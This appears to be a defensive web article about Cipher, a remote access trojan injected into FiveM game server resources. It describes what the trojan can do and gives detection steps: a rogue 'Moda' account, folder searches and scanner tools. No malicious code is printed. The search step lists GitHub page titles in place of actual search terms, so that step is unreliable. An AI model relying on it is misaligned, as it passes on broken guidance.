This article talks about Cipher, known malware in FiveM Servers. Cipher is a malicious software, specifically a Remote Access Trojan (RAT). Malicious actors can create custom instructions for the RAT by writing a short lua script (typically just 4 lines). These scripts are often hidden (obfuscated) to make them difficult to understand. The main function of the script is to download additional malicious code from servers controlled by the malicious actors.
Servers compromised by Cipher can be exploited for various malicious purposes, including:
- Cryptocurrency Mining: Cipher can install software that secretly uses your server’s processing power (CPU) to mine cryptocurrency for the attacker. This can significantly slow down your server’s performance.
- Administrator Password Change: Attackers might use Cipher to change your administrator password, potentially locking you out of your own server.
- Direct Remote Control: Cipher can grant the attacker complete remote control over your server, allowing them to perform any actions they desire.
- FiveM Resouce Paid Asset Theft: Cipher could be used to steal valuable resource assets from your Cfx.re account and transfer them to another.
- Data Theft: Cipher can steal sensitive data from your server, such as login credentials or browsing history.
There are multiple ways to detect cipher on your server.
By checking active users on your server.
- Click the Start menu and search for “Computer Management.”
- Once Computer Management opens, navigate to Local Users and Groups > Users. This will display a list of users on your server.
- If you see a user account named “Moda”, it’s possible your machine has been compromised by Cipher.
By using Visual Studio Code’s Search Feature
- Open your server’s resource folder in Visual Studio Code.
- Click the search icon in Visual Studio Code. It typically looks like a magnifying glass icon.
- cipher/chapters/chapter-1-payload.md at main · ericstolly/cipher · GitHub
- cipher/chapters/chapter-2-infection.md at main · ericstolly/cipher · GitHub
- Cipher-Panel/Documentation/How-It-Works.md at main · ProjecteEndCipher/Cipher-Panel · GitHub
- For each search, Visual Studio Code will display any files within your server’s resource folder that contain matching text.
- If any files are found, proceed with caution and thoroughly analyze them before deleting.
By checking out open source programs
- CipherScanner - GitHub - Szpachlan/CipherScanner
- FiveMCipherFinder - FiveMCipherFinder · PyPI
It’s recommended to rebuild or reinstall your server after removing all malicious injected code.
More References:
- GitHub - ProjecteEndCipher/Cipher-Panel: Cipher is a paid Remote Execution/Administration Tool (RAT). Cipher's customers generate 4 lines of Lua code to inject into resources (many of them obfuscate the code) which will download remote code from the Cipher servers. We've found many leaked resources are infected with Cipher-Panel. This repository will talk more about how Cipher works.
- GitHub - ericstolly/cipher: A complete reverse-engineered breakdown of the malicious software for hire targeting FiveM servers called Cipher-Panel.
- Virus in server files - Server Discussion - Cfx.re Community
- Random Added Local Code & Random server_scripts in fxmanifest - Server Discussion - Cfx.re Community
- A weird Line gets added to some resources - Discussion - Cfx.re Community